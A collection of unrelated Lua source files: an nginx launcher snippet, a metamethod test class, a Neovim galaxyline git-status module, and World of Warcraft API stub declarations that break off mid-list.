local nof = io.open(config.work_dir .. "/nginx.conf", "wb")
nof:write(template(config))
nof:close()
posix.chdir(config.work_dir)
posix.exec(config.nginx, { "-p", config.work_dir, "-c", "nginx.conf" })
|
do class "MetamethodTester"
{
val = 2,
cbClose = nil,
}
function Initialize(self, nVal, fnCloseCallback)
if nVal ~= nil then
self.val = nVal
end
self.cbClose = fnCloseCallback
end
function __close(self, err)
self.cbClose(err)
end
function __name(self)
return "MetamethodTester __name"
end
function __tostring(self)
return "MetamethodTester __tostring"
end
function __call(self)
return 42
end
function __add(lhs, rhs)
if isA(rhs, this) then
return lhs + rhs.val
else
return lhs.val + rhs
end
end
function __sub(lhs, rhs)
if isA(rhs, this) then
return lhs - rhs.val
else
return lhs.val - rhs
end
end
function __mul(lhs, rhs)
if isA(rhs, this) then
return lhs * rhs.val
else
return lhs.val * rhs
end
end
function __div(lhs, rhs)
if isA(rhs, this) then
return lhs / rhs.val
else
return lhs.val / rhs
end
end
function __mod(lhs, rhs)
if isA(rhs, this) then
return lhs % rhs.val
else
return lhs.val % rhs
end
end
function __pow(lhs, rhs)
if isA(rhs, this) then
return lhs ^ rhs.val
else
return lhs.val ^ rhs
end
end
function __unm(self)
return -self.val
end
function __concat(lhs, rhs)
if isA(rhs, this) then
return lhs.. tostring(rhs)
else
return tostring(lhs).. rhs
end
end
function __len(lhs)
return lhs.val
end
function __eq(lhs, rhs)
if isA(rhs, this) then
if isA(lhs, this) then
return lhs.val == rhs.val
else
return lhs == rhs.val
end
else
return lhs.val == rhs
end
end
function __lt(lhs, rhs)
return lhs.val < rhs.val
end
function __le(lhs, rhs)
return lhs.val <= rhs.val
end
function __idiv(lhs, rhs)
if isA(rhs, this) then
return lhs // rhs.val
else
return lhs.val // rhs
end
end
function __band(lhs, rhs)
if isA(rhs, this) then
return lhs & 0xFF
else
return 0xFF & rhs
end
end
function __bor(lhs, rhs)
if isA(rhs, this) then
return lhs | 0xFF
else
return 0xFF | rhs
end
end
function __bxor(lhs, rhs)
if isA(rhs, this) then
return lhs ~ 0xFF
else
return 0xFF ~ rhs
end
end
function __bnot(self)
return ~0xFF
end
function __shl(lhs, rhs)
if isA(rhs, this) then
return lhs << 2
else
return 0xFF << rhs
end
end
function __shr(lhs, rhs)
if isA(rhs, this) then
return lhs >> 2
else
return 0xFF >> rhs
end
end
end
|
local vim= vim
local common = require('galaxyline.common')
local M = {}
local function get_dir_contains(path, dirname)
-- return parent path for specified entry (either file or directory)
local function pathname(path)
local prefix = ""
local i = path:find("[\\/:][^\\/:]*$")
if i then
prefix = path:sub(1, i-1)
end
return prefix
end
-- Navigates up one level
local function up_one_level(path)
if path == nil then path = '.' end
if path == '.' then path = io.popen"cd":read'*l' end
return pathname(path)
end
-- Checks if provided directory contains git directory
local function has_specified_dir(path, specified_dir)
if path == nil then path = '.' end
return common.is_dir(path..'/'..specified_dir)
end
-- Set default path to current directory
if path == nil then path = '.' end
-- If we're already have .git directory here, then return current path
if has_specified_dir(path, dirname) then
return path..'/'..dirname
else
-- Otherwise go up one level and make a recursive call
local parent_path = up_one_level(path)
if parent_path == path then
return nil
else
return get_dir_contains(parent_path, dirname)
end
end
end
-- adapted from from clink-completions' git.lua
function M.get_git_dir(path)
-- return parent path for specified entry (either file or directory)
local function pathname(path)
local prefix = ""
local i = path:find("[\\/:][^\\/:]*$")
if i then
prefix = path:sub(1, i-1)
end
return prefix
end
-- Checks if provided directory contains git directory
local function has_git_dir(dir)
local git_dir = dir..'/.git'
if common.is_dir(git_dir) then return git_dir end
end
local function has_git_file(dir)
local gitfile = io.open(dir..'/.git')
if not gitfile then return false end
local git_dir = gitfile:read():match('gitdir: (.*)')
gitfile:close()
return git_dir and dir..'/'..git_dir
end
-- Set default path to current directory
if not path or path == '.' then path = io.popen"cd":read'*l' end
-- Calculate parent path now otherwise we won't be
-- able to do that inside of logical operator
local parent_path = pathname(path)
return has_git_dir(path)
or has_git_file(path)
-- Otherwise go up one level and make a recursive call
or (parent_path ~= path and M.get_git_dir(parent_path) or nil)
end
function M.check_git_workspace()
if vim.bo.buftype == 'terminal' then return false end
local current_file = vim.fn.expand('%:p')
local current_dir
-- if file is a symlinks
if vim.fn.getftype(current_file) == 'link' then
local real_file = vim.fn.resolve(current_file)
current_dir = vim.fn.fnamemodify(real_file,':h')
else
current_dir = vim.fn.expand('%:p:h')
end
local result = M.get_git_dir(current_dir)
if not result then return false end
return true
end
function M.get_git_branch()
if vim.bo.filetype == 'help' then return end
local current_file = vim.fn.expand('%:p')
local current_dir
-- if file is a symlinks
if vim.fn.getftype(current_file) == 'link' then
local real_file = vim.fn.resolve(current_file)
current_dir = vim.fn.fnamemodify(real_file,':h')
else
current_dir = vim.fn.expand('%:p:h')
end
local _,gitbranch_pwd = pcall(vim.api.nvim_buf_get_var,0,'gitbranch_pwd')
local _,gitbranch_path = pcall(vim.api.nvim_buf_get_var,0,'gitbranch_path')
if gitbranch_path and gitbranch_pwd then
if gitbranch_path:find(current_dir) and string.len(gitbranch_pwd) ~= 0 then
return gitbranch_pwd
end
end
local git_dir = M.get_git_dir(current_dir)
if not git_dir then return end
local git_root
if not git_dir:find('/.git') then
git_root = git_dir
end
git_root = git_dir:gsub('/.git','')
-- If git directory not found then we're probably outside of repo
-- or something went wrong. The same is when head_file is nil
local head_file = git_dir and io.open(git_dir..'/HEAD')
if not head_file then return end
local HEAD = head_file:read()
head_file:close()
-- if HEAD matches branch expression, then we're on named branch
-- otherwise it is a detached commit
local branch_name = HEAD:match('ref: refs/heads/(.+)')
if branch_name == nil then return end
vim.api.nvim_buf_set_var(0,'gitbranch_pwd',branch_name)
vim.api.nvim_buf_set_var(0,'gitbranch_path',git_root)
return branch_name .. ' '
end
-- get diff datas
-- support plugins: vim-gitgutter vim-signify coc-git
local function get_hunks_data()
-- diff data 1:add 2:modified 3:remove
local diff_data = {0,0,0}
if vim.fn.exists('*GitGutterGetHunkSummary') == 1 then
for idx,v in pairs(vim.fn.GitGutterGetHunkSummary()) do
diff_data[idx] = v
end
return diff_data
elseif vim.fn.exists('*sy#repo#get_stats') == 1 then
diff_data[1] = vim.fn['sy#repo#get_stats']()[1]
diff_data[2] = vim.fn['sy#repo#get_stats']()[2]
diff_data[3] = vim.fn['sy#repo#get_stats']()[3]
return diff_data
elseif vim.fn.exists('b:gitsigns_status') == 1 then
local gitsigns_dict = vim.api.nvim_buf_get_var(0, 'gitsigns_status')
diff_data[1] = tonumber(gitsigns_dict:match('+(%d+)')) or 0
diff_data[2] = tonumber(gitsigns_dict:match('~(%d+)')) or 0
diff_data[3] = tonumber(gitsigns_dict:match('-(%d+)')) or 0
end
return diff_data
end
function M.diff_add()
local add = get_hunks_data()[1]
if add > 0 then
return add .. ' '
end
end
function M.diff_modified()
local modified = get_hunks_data()[2]
if modified > 0 then
return modified .. ' '
end
end
function M.diff_remove()
local removed = get_hunks_data()[3]
if removed > 0 then
return removed .. ' '
end
end
return M
|
---@param index number
---@param isRaid boolean
---@return number instanceID
---@return string name
---@return string description
---@return number bgImage
---@return number buttonImage1
---@return number loreImage
---@return number buttonImage2
---@return number dungeonAreaMapID
---@return string link
---@return boolean shouldDisplayDifficulty
---[Documentation](https://wow.gamepedia.com/API_EJ_GetInstanceByIndex)
function EJ_GetInstanceByIndex(index, isRaid) end
---@param mapID number
---@return number instanceID
---[Documentation](https://wow.gamepedia.com/API_EJ_GetInstanceForMap)
function EJ_GetInstanceForMap(mapID) end
---@param instanceID number
---@return string name
---@return string description
---@return number bgImage
---@return number buttonImage1
---@return number loreImage
---@return number buttonImage2
---@return number dungeonAreaMapID
---@return string link
---@return boolean shouldDisplayDifficulty
---[Documentation](https://wow.gamepedia.com/API_EJ_GetInstanceInfo)
function EJ_GetInstanceInfo(instanceID) end
---[Documentation](https://wow.gamepedia.com/API_EJ_GetInvTypeSortOrder)
function EJ_GetInvTypeSortOrder(invType) end
---@return number classID
---@return number specID
---[Documentation](https://wow.gamepedia.com/API_EJ_GetLootFilter)
function EJ_GetLootFilter() end
---[Documentation](https://wow.gamepedia.com/API_EJ_GetMapEncounter)
function EJ_GetMapEncounter(mapID, index, fromJournal) end
---@param index number
---@return number numLoot
---[Documentation](https://wow.gamepedia.com/API_EJ_GetNumEncountersForLootByIndex)
function EJ_GetNumEncountersForLootByIndex(index) end
---@return number numLoot
---[Documentation](https://wow.gamepedia.com/API_EJ_GetNumLoot)
function EJ_GetNumLoot() end
---@return number numResults
---[Documentation](https://wow.gamepedia.com/API_EJ_GetNumSearchResults)
function EJ_GetNumSearchResults() end
---@return number numTiers
---[Documentation](https://wow.gamepedia.com/API_EJ_GetNumTiers)
function EJ_GetNumTiers() end
---@return number searchProgress
---[Documentation](https://wow.gamepedia.com/API_EJ_GetSearchProgress)
function EJ_GetSearchProgress() end
---@param index number
---@return number id
---@return number stype
---@return number difficultyID
---@return number instanceID
---@return number encounterID
---@return string itemLink
---[Documentation](https://wow.gamepedia.com/API_EJ_GetSearchResult)
function EJ_GetSearchResult(index) end
---@return number searchSize
---[Documentation](https://wow.gamepedia.com/API_EJ_GetSearchSize)
function EJ_GetSearchSize() end
---@param sectionID number
---@return number sectionID
---@return number parentSectionID
---@return number grandParentSectionID
---[Documentation](https://wow.gamepedia.com/API_EJ_GetSectionPath)
function EJ_GetSectionPath(sectionID) end
---@param index number
---@return string name
---@return string link
---[Documentation](https://wow.gamepedia.com/API_EJ_GetTierInfo)
function EJ_GetTierInfo(index) end
---[Documentation](https://wow.gamepedia.com/API_EJ_HandleLinkPath)
function EJ_HandleLinkPath(jtype, id) end
---@return boolean isRaid
---[Documentation](https://wow.gamepedia.com/API_EJ_InstanceIsRaid)
function EJ_InstanceIsRaid() end
---@return boolean listOutOfDate
---[Documentation](https://wow.gamepedia.com/API_EJ_IsLootListOutOfDate)
function EJ_IsLootListOutOfDate() end
---@return boolean isFinished
---[Documentation](https://wow.gamepedia.com/API_EJ_IsSearchFinished)
function EJ_IsSearchFinished() end
---@param difficultyID number
---@return boolean isValid
---[Documentation](https://wow.gamepedia.com/API_EJ_IsValidInstanceDifficulty)
function EJ_IsValidInstanceDifficulty(difficultyID) end
---[Documentation](https://wow.gamepedia.com/API_EJ_ResetLootFilter)
function EJ_ResetLootFilter() end
---@param encounterID number
---[Documentation](https://wow.gamepedia.com/API_EJ_SelectEncounter)
function EJ_SelectEncounter(encounterID) end
---@param instanceID number
---[Documentation](https://wow.gamepedia.com/API_EJ_SelectInstance)
function EJ_SelectInstance(instanceID) end
---@param index number
---[Documentation](https://wow.gamepedia.com/API_EJ_SelectTier)
function EJ_SelectTier(index) end
---@param difficultyID number
---[Documentation](https://wow.gamepedia.com/API_EJ_SetDifficulty)
function EJ_SetDifficulty(difficultyID) end
---@param classID number
---@param specID number
---[Documentation](https://wow.gamepedia.com/API_EJ_SetLootFilter)
function EJ_SetLootFilter(classID, specID) end
---@param text string
---[Documentation](https://wow.gamepedia.com/API_EJ_SetSearch)
function EJ_SetSearch(text) end
---[Documentation](https://wow.gamepedia.com/API_EditMacro)
function EditMacro(index, name, iconIndex, body, isLocal, perCharacter) end
---[Documentation](https://wow.gamepedia.com/API_EjectPassengerFromSeat)
function EjectPassengerFromSeat(seat) end
---[Documentation](https://wow.gamepedia.com/API_EnableAddOn)
function EnableAddOn() end
---[Documentation](https://wow.gamepedia.com/API_EnableAllAddOns)
function EnableAllAddOns() end
---[Documentation](https://wow.gamepedia.com/API_EnableSpellAutocast)
function EnableSpellAutocast() end
---[Documentation](https://wow.gamepedia.com/API_EndBoundTradeable)
function EndBoundTradeable(type) end
---[Documentation](https://wow.gamepedia.com/API_EndRefund)
function EndRefund() end
---@param currentFrame table
---@return table nextFrame
---[Documentation](https://wow.gamepedia.com/API_EnumerateFrames)
function EnumerateFrames(currentFrame) end
---[Documentation](https://wow.gamepedia.com/API_EnumerateServerChannels)
function EnumerateServerChannels() end
---[Documentation](https://wow.gamepedia.com/API_EquipCursorItem)
function EquipCursorItem(invSlot) end
---[Documentation](https://wow.gamepedia.com/API_EquipItemByName)
function EquipItemByName(item, invSlot) end
---[Documentation](https://wow.gamepedia.com/API_EquipPendingItem)
function EquipPendingItem(invSlot) end
---[Documentation](https://wow.gamepedia.com/API_ExecuteVoidTransfer)
function ExecuteVoidTransfer() end
---[Documentation](https://wow.gamepedia.com/API_ExpandAllFactionHeaders)
function ExpandAllFactionHeaders() end
---@param rowIndex number
---[Documentation](https://wow.gamepedia.com/API_ExpandFactionHeader)
function ExpandFactionHeader(rowIndex) end
---[Documentation](https://wow.gamepedia.com/API_ExpandGuildTradeSkillHeader)
function ExpandGuildTradeSkillHeader(tradeSkillID) end
---[Documentation](https://wow.gamepedia.com/API_ExpandQuestHeader)
function ExpandQuestHeader() end
---[Documentation](https://wow.gamepedia.com/API_ExpandWarGameHeader)
function ExpandWarGameHeader(index) end
---[Documentation](https://wow.gamepedia.com/API_FactionToggleAtWar)
function FactionToggleAtWar(index) end
---[Documentation](https://wow.gamepedia.com/API_FillLocalizedClassList)
function FillLocalizedClassList(classTable, isFemale) end
---@param spellID number
---@return number baseSpellID
---[Documentation](https://wow.gamepedia.com/API_FindBaseSpellByID)
function FindBaseSpellByID(spellID) end
---[Documentation](https://wow.gamepedia.com/API_FindFlyoutSlotBySpellID)
function FindFlyoutSlotBySpellID(spellID) end
---[Documentation](https://wow.gamepedia.com/API_FindSpellBookSlotBySpellID)
function FindSpellBookSlotBySpellID(spellID, isPet) end
---@param spellID number
---@return number overrideSpellID
---[Documentation](https://wow.gamepedia.com/API_FindSpellOverrideByID)
function FindSpellOverrideByID(spellID) end
---[Documentation](https://wow.gamepedia.com/API_FlagTutorial)
function FlagTutorial(tutorial) end
---[Documentation](https://wow.gamepedia.com/API_FlashClientIcon)
function FlashClientIcon() end
---[Documentation](https://wow.gamepedia.com/API_FlipCameraYaw)
function FlipCameraYaw(degrees) end
---@param flyoutID number
---@param spellID number
---@return boolean hasSpell
---[Documentation](https://wow.gamepedia.com/API_FlyoutHasSpell)
function FlyoutHasSpell(flyoutID, spellID) end
---[Documentation](https://wow.gamepedia.com/API_FocusUnit)
function FocusUnit(unit) end
---[Documentation](https://wow.gamepedia.com/API_FollowUnit)
function FollowUnit(unit) end
---[Documentation](https://wow.gamepedia.com/API_ForceLogout)
function ForceLogout() end
---[Documentation](https://wow.gamepedia.com/API_ForceQuit)
function ForceQuit() end
---[Documentation](https://wow.gamepedia.com/API_ForfeitDuel)
function ForfeitDuel() end
---[Documentation](https://wow.gamepedia.com/API_FrameXML_Debug)
function FrameXML_Debug(flag) end
---[Documentation](https://wow.gamepedia.com/API_GMEuropaBugsEnabled)
function GMEuropaBugsEnabled() end
---[Documentation](https://wow.gamepedia.com/API_GMEuropaComplaintsEnabled)
function GMEuropaComplaintsEnabled() end
---[Documentation](https://wow.gamepedia.com/API_GMEuropaSuggestionsEnabled)
function GMEuropaSuggestionsEnabled() end
---[Documentation](https://wow.gamepedia.com/API_GMEuropaTicketsEnabled)
function GMEuropaTicketsEnabled() end
---[Documentation](https://wow.gamepedia.com/API_GMItemRestorationButtonEnabled)
function GMItemRestorationButtonEnabled() end
---[Documentation](https://wow.gamepedia.com/API_GMQuickTicketSystemEnabled)
function GMQuickTicketSystemEnabled() end
---[Documentation](https://wow.gamepedia.com/API_GMQuickTicketSystemThrottled)
function GMQuickTicketSystemThrottled() end
---[Documentation](https://wow.gamepedia.com/API_GMReportLag)
function GMReportLag() end
---[Documentation](https://wow.gamepedia.com/API_GMRequestPlayerInfo)
function GMRequestPlayerInfo() end
---[Documentation](https://wow.gamepedia.com/API_GMResponseResolve)
function GMResponseResolve() end
---[Documentation](https://wow.gamepedia.com/API_GMSurveyAnswer)
function GMSurveyAnswer() end
---[Documentation](https://wow.gamepedia.com/API_GMSurveyAnswerSubmit)
function GMSurveyAnswerSubmit(question, rank, comment) end
---[Documentation](https://wow.gamepedia.com/API_GMSurveyCommentSubmit)
function GMSurveyCommentSubmit(comment) end
---[Documentation](https://wow.gamepedia.com/API_GMSurveyNumAnswers)
function GMSurveyNumAnswers() end
---[Documentation](https://wow.gamepedia.com/API_GMSurveyQuestion)
function GMSurveyQuestion() end
---[Documentation](https://wow.gamepedia.com/API_GMSurveySubmit)
function GMSurveySubmit() end
---[Documentation](https://wow.gamepedia.com/API_GameMovieFinished)
function GameMovieFinished() end
---@param achievementID number
---@return number categoryID
---[Documentation](https://wow.gamepedia.com/API_GetAchievementCategory)
function GetAchievementCategory(achievementID) end
---@param achievementID number
---@return boolean completed
---@return number month
---@return number day
---@return number year
---[Documentation](https://wow.gamepedia.com/API_GetAchievementComparisonInfo)
function GetAchievementComparisonInfo(achievementID) end
---[Documentation](https://wow.gamepedia.com/API_GetAchievementCriteriaInfo)
function GetAchievementCriteriaInfo(achievementID, criteriaNum) end
---[Documentation](https://wow.gamepedia.com/API_GetAchievementCriteriaInfoByID)
function GetAchievementCriteriaInfoByID(achievementID, criteriaIndex) end
---[Documentation](https://wow.gamepedia.com/API_GetAchievementGuildRep)
function GetAchievementGuildRep() end
---[Documentation](https://wow.gamepedia.com/API_GetAchievementInfo)
function GetAchievementInfo() end
---[Documentation](https://wow.gamepedia.com/API_GetAchievementLink)
function GetAchievementLink(achievementID) end
---[Documentation](https://wow.gamepedia.com/API_GetAchievementNumCriteria)
function GetAchievementNumCriteria(achievementID) end
---[Documentation](https://wow.gamepedia.com/API_GetAchievementNumRewards)
function GetAchievementNumRewards(achievementID) end
---[Documentation](https://wow.gamepedia.com/API_GetAchievementReward)
function GetAchievementReward(achievementID, rewardIndex) end
---[Documentation](https://wow.gamepedia.com/API_GetAchievementSearchProgress)
function GetAchievementSearchProgress() end
---[Documentation](https://wow.gamepedia.com/API_GetAchievementSearchSize)
function GetAchievementSearchSize() end
---[Documentation](https://wow.gamepedia.com/API_GetActionAutocast)
function GetActionAutocast(slot) end
---@return number index
---[Documentation](https://wow.gamepedia.com/API_GetActionBarPage)
function GetActionBarPage() end
---[Documentation](https://wow.gamepedia.com/API_GetActionBarToggles)
function GetActionBarToggles() end
---@param slot number
---@return number currentCharges
---@return number maxCharges
---@return number cooldownStart
---@return number cooldownDuration
---@return number chargeModRate
---[Documentation](https://wow.gamepedia.com/API_GetActionCharges)
function GetActionCharges(slot) end
---[Documentation](https://wow.gamepedia.com/API_GetActionCooldown)
function GetActionCooldown(slot) end
---@param actionSlot number
---@return number text
---[Documentation](https://wow.gamepedia.com/API_GetActionCount)
function GetActionCount(actionSlot) end
---[Documentation](https://wow.gamepedia.com/API_GetActionInfo)
function GetActionInfo(slot) end
---@param slot number
---@return number start
---@return number duration
---[Documentation](https://wow.gamepedia.com/API_GetActionLossOfControlCooldown)
function GetActionLossOfControlCooldown(slot) end
---[Documentation](https://wow.gamepedia.com/API_GetActionText)
function GetActionText(slot) end
---[Documentation](https://wow.gamepedia.com/API_GetActionTexture)
function GetActionTexture(slot) end
---[Documentation](https://wow.gamepedia.com/API_GetActiveArtifactByRace)
function GetActiveArtifactByRace(raceIndex) end
---[Documentation](https://wow.gamepedia.com/API_GetActiveLevel)
function GetActiveLevel(index) end
---[Documentation](https://wow.gamepedia.com/API_GetActiveLootRollIDs)
function GetActiveLootRollIDs() end
---[Documentation](https://wow.gamepedia.com/API_GetActiveQuestID)
function GetActiveQuestID(index) end
---@param isInspect boolean
---@return number activeSpec
---[Documentation](https://wow.gamepedia.com/API_GetActiveSpecGroup)
function GetActiveSpecGroup(isInspect) end
---[Documentation](https://wow.gamepedia.com/API_GetActiveTitle)
function GetActiveTitle(index) end
---[Documentation](https://wow.gamepedia.com/API_GetAddOnCPUUsage)
function GetAddOnCPUUsage() end
---[Documentation](https://wow.gamepedia.com/API_GetAddOnDependencies)
function GetAddOnDependencies() end
---[Documentation](https://wow.gamepedia.com/API_GetAddOnEnableState)
function GetAddOnEnableState() end
---[Documentation](https://wow.gamepedia.com/API_GetAddOnInfo)
function GetAddOnInfo() end
---[Documentation](https://wow.gamepedia.com/API_GetAddOnMemoryUsage)
function GetAddOnMemoryUsage() end
---@param addon string
---@param field string
---@return string value
---[Documentation](https://wow.gamepedia.com/API_GetAddOnMetadata)
function GetAddOnMetadata(addon, field) end
---[Documentation](https://wow.gamepedia.com/API_GetAddOnOptionalDependencies)
function GetAddOnOptionalDependencies() end
---[Documentation](https://wow.gamepedia.com/API_GetAllowLowLevelRaid)
function GetAllowLowLevelRaid() end
---[Documentation](https://wow.gamepedia.com/API_GetAlternativeDefaultLanguage)
function GetAlternativeDefaultLanguage() end
---@return string localizedName
---[Documentation](https://wow.gamepedia.com/API_GetArchaeologyInfo)
function GetArchaeologyInfo() end
---@param raceIndex number
---@return string raceName
---@return number raceTexture
---@return number raceItemID
---@return number numFragmentsCollected
---@return number numFragmentsRequired
---@return number maxFragments
---[Documentation](https://wow.gamepedia.com/API_GetArchaeologyRaceInfo)
function GetArchaeologyRaceInfo(raceIndex) end
---[Documentation](https://wow.gamepedia.com/API_GetArchaeologyRaceInfoByID)
function GetArchaeologyRaceInfoByID(researchBranchID) end
---[Documentation](https://wow.gamepedia.com/API_GetAreaSpiritHealerTime)
function GetAreaSpiritHealerTime() end
---[Documentation](https://wow.gamepedia.com/API_GetAreaText)
function GetAreaText() end
---[Documentation](https://wow.gamepedia.com/API_GetArenaOpponentSpec)
function GetArenaOpponentSpec() end
---@param raceIndex number
---@param artifactIndex number
---@return string artifactName
---@return string artifactDescription
---@return number artifactRarity
---@return string artifactIcon
---@return string hoverDescription
---@return number keystoneCount
---@return string bgTexture
---@return number firstCompletionTime
---@return number completionCount
---[Documentation](https://wow.gamepedia.com/API_GetArtifactInfoByRace)
function GetArtifactInfoByRace(raceIndex, artifactIndex) end
---@return number numFragmentsCollected
---@return number numFragmentsAdded
---@return number numFragmentsRequired
---[Documentation](https://wow.gamepedia.com/API_GetArtifactProgress)
function GetArtifactProgress() end
---@param statId number
---@param amount number
---@return number ap
---[Documentation](https://wow.gamepedia.com/API_GetAttackPowerForStat)
function GetAttackPowerForStat(statId, amount) end
---[Documentation](https://wow.gamepedia.com/API_GetAutoCompletePresenceID)
function GetAutoCompletePresenceID(name) end
---@param realmNames table
---@return table realmNames
---[Documentation](https://wow.gamepedia.com/API_GetAutoCompleteRealms)
function GetAutoCompleteRealms(realmNames) end
---[Documentation](https://wow.gamepedia.com/API_GetAutoCompleteResults)
function GetAutoCompleteResults(text, include, exclude, maxResults, cursorPosition) end
---@return number enabled
---[Documentation](https://wow.gamepedia.com/API_GetAutoDeclineGuildInvites)
function GetAutoDeclineGuildInvites() end
---@param index number
---@return number questID
---@return string type
---[Documentation](https://wow.gamepedia.com/API_GetAutoQuestPopUp)
function GetAutoQuestPopUp(index) end
---[Documentation](https://wow.gamepedia.com/API_GetAvailableBandwidth)
function GetAvailableBandwidth() end
---[Documentation](https://wow.gamepedia.com/API_GetAvailableLevel)
function GetAvailableLevel(index) end
---[Documentation](https://wow.gamepedia.com/API_GetAvailableLocaleInfo)
function GetAvailableLocaleInfo(ignoreLocaleRestrictions) end
---[Documentation](https://wow.gamepedia.com/API_GetAvailableLocales)
function GetAvailableLocales() end
---@param index number
---@return boolean isTrivial
---@return number frequency
---@return boolean isRepeatable
---@return boolean isLegendary
---@return number questID
---[Documentation](https://wow.gamepedia.com/API_GetAvailableQuestInfo)
function GetAvailableQuestInfo(index) end
---[Documentation](https://wow.gamepedia.com/API_GetAvailableTitle)
function GetAvailableTitle(index) end
---@return number avgItemLevel
---@return number avgItemLevelEquipped
---@return number avgItemLevelPvp
---[Documentation](https://wow.gamepedia.com/API_GetAverageItemLevel)
function GetAverageItemLevel() end
---[Documentation](https://wow.gamepedia.com/API_GetAvoidance)
function GetAvoidance() end
---[Documentation](https://wow.gamepedia.com/API_GetBackgroundLoadingStatus)
function GetBackgroundLoadingStatus() end
---[Documentation](https://wow.gamepedia.com/API_GetBackpackAutosortDisabled)
function GetBackpackAutosortDisabled() end
---[Documentation](https://wow.gamepedia.com/API_GetBagName)
function GetBagName(bagID) end
---[Documentation](https://wow.gamepedia.com/API_GetBagSlotFlag)
function GetBagSlotFlag(index, flagIndex) end
---[Documentation](https://wow.gamepedia.com/API_GetBankAutosortDisabled)
function GetBankAutosortDisabled() end
---[Documentation](https://wow.gamepedia.com/API_GetBankBagSlotFlag)
function GetBankBagSlotFlag() end
---@param numSlots number
---@return number cost
---[Documentation](https://wow.gamepedia.com/API_GetBankSlotCost)
function GetBankSlotCost(numSlots) end
---[Documentation](https://wow.gamepedia.com/API_GetBarberShopStyleInfo)
function GetBarberShopStyleInfo(id) end
---[Documentation](https://wow.gamepedia.com/API_GetBarberShopTotalCost)
function GetBarberShopTotalCost() end
---[Documentation](https://wow.gamepedia.com/API_GetBattlefieldArenaFaction)
function GetBattlefieldArenaFaction() end
---@return number waitTime
---[Documentation](https://wow.gamepedia.com/API_GetBattlefieldEstimatedWaitTime)
function GetBattlefieldEstimatedWaitTime() end
---[Documentation](https://wow.gamepedia.com/API_GetBattlefieldFlagPosition)
function GetBattlefieldFlagPosition(index) end
---[Documentation](https://wow.gamepedia.com/API_GetBattlefieldInstanceExpiration)
function GetBattlefieldInstanceExpiration() end
---@return number time
---[Documentation](https://wow.gamepedia.com/API_GetBattlefieldInstanceRunTime)
function GetBattlefieldInstanceRunTime() end
---[Documentation](https://wow.gamepedia.com/API_GetBattlefieldMapIconScale)
function GetBattlefieldMapIconScale() end
---[Documentation](https://wow.gamepedia.com/API_GetBattlefieldPortExpiration)
function GetBattlefieldPortExpiration(index) end
---[Documentation](https://wow.gamepedia.com/API_GetBattlefieldScore)
function GetBattlefieldScore(index) end
---[Documentation](https://wow.gamepedia.com/API_GetBattlefieldStatData)
function GetBattlefieldStatData(playerIndex, slotIndex) end
---[Documentation](https://wow.gamepedia.com/API_GetBattlefieldStatus)
function GetBattlefieldStatus(index) end
---[Documentation](https://wow.gamepedia.com/API_GetBattlefieldTeamInfo)
function GetBattlefieldTeamInfo(index) end
---[Documentation](https://wow.gamepedia.com/API_GetBattlefieldTimeWaited)
function GetBattlefieldTimeWaited(index) end
---[Documentation](https://wow.gamepedia.com/API_GetBattlefieldWinner)
function GetBattlefieldWinner() end
---[Documentation](https://wow.gamepedia.com/API_GetBattlegroundInfo)
function GetBattlegroundInfo(index) end
---@param team number
---@return number currentPoints
---@return number maxPoints
---[Documentation](https://wow.gamepedia.com/API_GetBattlegroundPoints)
function GetBattlegroundPoints(team) end
---@return number flexDungeonID
---[Documentation](https://wow.gamepedia.com/API_GetBestFlexRaidChoice)
function GetBestFlexRaidChoice() end
---[Documentation](https://wow.gamepedia.com/API_GetBestRFChoice)
function GetBestRFChoice() end
---@return number secondsRemaining
---[Documentation](https://wow.gamepedia.com/API_GetBillingTimeRested)
function GetBillingTimeRested() end
---[Documentation](https://wow.gamepedia.com/API_GetBindLocation)
function GetBindLocation() end
---[Documentation](https://wow.gamepedia.com/API_GetBinding)
function GetBinding(index) end
---@param binding string
---@param checkOverride boolean
---@return string action
---[Documentation](https://wow.gamepedia.com/API_GetBindingAction)
function GetBindingAction(binding, checkOverride) end
---@param key string
---@return string bindingAction
---[Documentation](https://wow.gamepedia.com/API_GetBindingByKey)
function GetBindingByKey(key) end
---[Documentation](https://wow.gamepedia.com/API_GetBindingKey)
function GetBindingKey(command) end
---@param key string
---@param prefix string
---@param abbreviate boolean
---@return string text
---[Documentation](https://wow.gamepedia.com/API_GetBindingText)
function GetBindingText(key, prefix, abbreviate) end
---@return number blockChance
---[Documentation](https://wow.gamepedia.com/API_GetBlockChance)
function GetBlockChance() end
---[Documentation](https://wow.gamepedia.com/API_GetBonusBarIndex)
function GetBonusBarIndex() end
---[Documentation](https://wow.gamepedia.com/API_GetBonusBarOffset)
function GetBonusBarOffset() end
---[Documentation](https://wow.gamepedia.com/API_GetBuildInfo)
function GetBuildInfo() end
---[Documentation](https://wow.gamepedia.com/API_GetBuybackItemInfo)
function GetBuybackItemInfo(index) end
---[Documentation](https://wow.gamepedia.com/API_GetBuybackItemLink)
function GetBuybackItemLink(index) end
---[Documentation](https://wow.gamepedia.com/API_GetCVarInfo)
function GetCVarInfo(name) end
---[Documentation](https://wow.gamepedia.com/API_GetCVarSettingValidity)
function GetCVarSettingValidity(cvar, settingsCount, isRaid) end
---[Documentation](https://wow.gamepedia.com/API_GetCallPetSpellInfo)
function GetCallPetSpellInfo(spellID) end
---[Documentation](https://wow.gamepedia.com/API_GetCameraZoom)
function GetCameraZoom() end
---[Documentation](https://wow.gamepedia.com/API_GetCategoryAchievementPoints)
function GetCategoryAchievementPoints(categoryID, includeSubCategories) end
---@param categoryID number
---@return string title
---@return number parentCategoryID
---@return number flags
---[Documentation](https://wow.gamepedia.com/API_GetCategoryInfo)
function GetCategoryInfo(categoryID) end
---@return table idTable
---[Documentation](https://wow.gamepedia.com/API_GetCategoryList)
function GetCategoryList() end
---@param categoryId number
---@param includeAll boolean
---@return number total
---@return number completed
---@return number incompleted
---[Documentation](https://wow.gamepedia.com/API_GetCategoryNumAchievements)
function GetCategoryNumAchievements(categoryId, includeAll) end
---[Documentation](https://wow.gamepedia.com/API_GetCemeteryPreference)
function GetCemeteryPreference() end
---[Documentation](https://wow.gamepedia.com/API_GetChannelDisplayInfo)
function GetChannelDisplayInfo(channelID) end
---@return number id
---@return string name
---@return boolean disabled
---[Documentation](https://wow.gamepedia.com/API_GetChannelList)
function GetChannelList() end
---[Documentation](https://wow.gamepedia.com/API_GetChannelName)
function GetChannelName() end
---[Documentation](https://wow.gamepedia.com/API_GetChatTypeIndex)
function GetChatTypeIndex(type) end
---[Documentation](https://wow.gamepedia.com/API_GetChatWindowChannels)
function GetChatWindowChannels(index) end
---[Documentation](https://wow.gamepedia.com/API_GetChatWindowInfo)
